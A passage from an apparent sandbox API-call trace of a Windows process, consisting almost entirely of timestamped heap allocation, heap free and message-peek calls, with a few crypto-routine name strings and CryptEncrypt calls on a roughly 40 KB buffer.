hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.041] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0173.042] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0173.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.044] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.044] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.045] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0173.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.045] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.047] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x9ec8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x9ed0) returned 1 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0173.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.048] CharLowerBuffW (in: lpsz="byte[40657]", cchLength=0xb | out: lpsz="byte[40657]") returned 0xb [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.051] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0173.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.051] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c5180*, pdwDataLen=0x87e820*=0x9ec8, dwBufLen=0x9ed0 | out: pbData=0x9c5180*, pdwDataLen=0x87e820*=0x9ed0) returned 1 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0173.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 